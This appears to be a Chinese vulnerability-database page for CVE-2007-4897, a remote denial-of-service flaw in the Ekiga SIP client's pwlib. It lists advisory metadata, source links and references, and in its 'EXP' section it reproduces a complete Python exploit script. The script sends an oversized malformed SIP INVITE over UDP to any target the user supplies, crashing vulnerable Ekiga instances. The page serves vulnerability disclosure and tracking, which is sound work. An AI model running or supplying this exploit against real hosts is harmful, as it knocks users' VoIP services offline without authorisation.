Ekiga GetHostAddress 远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118185 漏洞类型 资源管理错误
发布时间 2009-07-24 更新时间 2009-07-27
CVE编号 CVE-2007-4897 CNNVD-ID CNNVD-200709-181
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/9241
https://www.securityfocus.com/bid/25642
https://cxsecurity.com/issue/WLB-2007090055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-181
|漏洞详情
pwlib在Ekiga2.0.5及可能其他的产品中使用时允许远程攻击者通过向PString::vsprintf函数提交一个一个长的论据导致拒绝服务攻击。这一问题与糟糕的内存管理有关。
|漏洞EXP
#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs

import sys,socket

if len(sys.argv) != 3: 
	sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
		   "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
		   "Contact:sip:pepe@172.91.1.133:5060\r\n"+\
		   "Content-Length:417\r\n"+\
		   "Content-Type:application/sdp\r\n"+\
		   "CSeq:4321 INVITE\r\n"+\
		   "From:sip:pepe@172.91.1.148:5060;tag=a48s\r\n"+\
		   "Max-Forwards:70\r\n"+\
         "To:sip:paco@micasa.com\r\n"+\
         "Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\r\n\r\n"		 

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()

# milw0rm.com [2009-07-24]
|受影响的产品
Ubuntu Ubuntu Linux 7.10 sparc Ubuntu Ubuntu Linux 7.10 powerpc Ubuntu Ubuntu Linux 7.10 i386 Ubuntu Ubuntu Linux 7.10 amd64 Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu
|参考资料

来源:MISC
链接:https://bugzilla.redhat.com/show_bug.cgi?id=292831
来源:XF
名称:ekiga-sipurlgethostaddress-dos(36568)
链接:http://xforce.iss.net/xforce/xfdb/36568
来源:SECTRACK
名称:1018683
链接:http://www.securitytracker.com/id?1018683
来源:BID
名称:25642
链接:http://www.securityfocus.com/bid/25642
来源:BUGTRAQ
名称:20070912S21SEC-036-ENEkiga<=2.0.5Denialofservice
链接:http://www.securityfocus.com/archive/1/archive/1/479185/100/0/threaded
来源:MISC
链接:http://www.s21sec.com/avisos/s21sec-036-en.txt
来源:REDHAT
名称:RHSA-2007:0932
链接:http://www.redhat.com/support/errata/RHSA-2007-0932.html
来源:MANDRIVA
名称:MDKSA-2007:206
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2007:206
来源:SREASON
名称:3138
链接:http://securityreason.com/securityalert/3138
来源:SECUNIA
名称:27518
链接:http://secunia.com/advisories/27518
来源:SECUNIA
名称:27150
链接:http://secunia.com/advisories/27150
来源:SECUNIA
名称:27127
链接:http://secunia.com/advisories/27127
来源:MISC
链接:http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sipcon.cxx?r1=2.120.2.25&r2=